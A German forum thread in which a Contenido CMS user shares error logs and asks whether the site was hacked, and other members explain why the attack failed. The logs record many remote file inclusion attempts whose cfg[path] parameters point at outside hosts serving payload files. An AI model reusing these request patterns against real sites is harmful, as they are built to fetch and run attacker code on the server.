Seltsamer Fehlerloginhalt in 4.8.12 [gelöst]

[yui]

Hallo zusammen,

meine obige Installation wurde gehackt. In den Fehlerlogs erscheinen folgenden Meldungen:

m_virtuemart/idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 6/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:06:20] /Contenido/cms/front_content.php?idcat=6/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 25.
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 24.
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 25.
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 77//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 77//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? next_record called with no query pending in Module ID 24.
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? next_record called with no query pending in Module ID 25.

Nun wurde hier bereits über die include.newsletter_jobs_subnav.php geschrieben, allerdings weiss ich nicht, was ich jetzt am sinnvollsten anstelle. Kann mir jemand einen Tipp geben?

Danke und schöne Grüsse
yui

[idea-tec]

Mich würden die auswirkungen auf der Seite interessieren.

[yui]

Auf der Seite selbst ist nichts zu erkennen, es ist auch kein Quellcode zu erkennen ausser dem, der dort sein muss. Mein Provider hat mir geschrieben, dass es keinen auffälligen Traffic gibt.

Kann der Code auch bedeuten, dass zwar Contenido attackiert wurde, das aber eben keine Auswirkungen hat?

[Dodger77]

Kann der Code auch bedeuten, dass zwar Contenido attackiert wurde, das aber eben keine Auswirkungen hat?

Richtig. Die im Errorlog zu sehenden Angriffe auf die "/contenido/includes/include.newsletter_jobs_subnav.php" sollten in der 4.8.12 nicht zum Erfolg führen.

[Oldperl]

Hallo yui,

dein Problem liegt nicht direkt an Contenido, sondern an den Modulen mit ID 24 und 25. Dort werden per Request übergebene Daten, z.B. die idcat, nicht auf sicheren Inhalt geprüft, bzw. evtl. schon beim Request mit falschen Inhalten gefüllt.
Bitte prüfe entsprechend deine Module, evtl. sind dort noch ältere Module im Einsatz oder es wurde nicht auf Prüfung von Requestvariablen geachtet. Ein Einsatz der PHP-Boardmittel (is_numeric, mysql_realescape_string) oder der Securityklasse kann ich da nur empfehlen.

Gruß aus Franken

Ortwin

PS: Sollte es sich bei den Modulen um Standardmodule der 4.8.12 handeln, so bitte ich um kurze Info per PN um welche es sich handelt. Und bitte noch den Threadtitel abändern, da es sich nicht um einen geglückten Hack handelt, danke.

[idea-tec]

danke... ich hatte versucht, dass yui selbst erkennt, dass es kein hack gewesen sein kann.
wenn wir solche postigs vermeiden wollen, müssen wir die user ein wenig sensibilisieren und vor allem mit Wissen versorgen!!!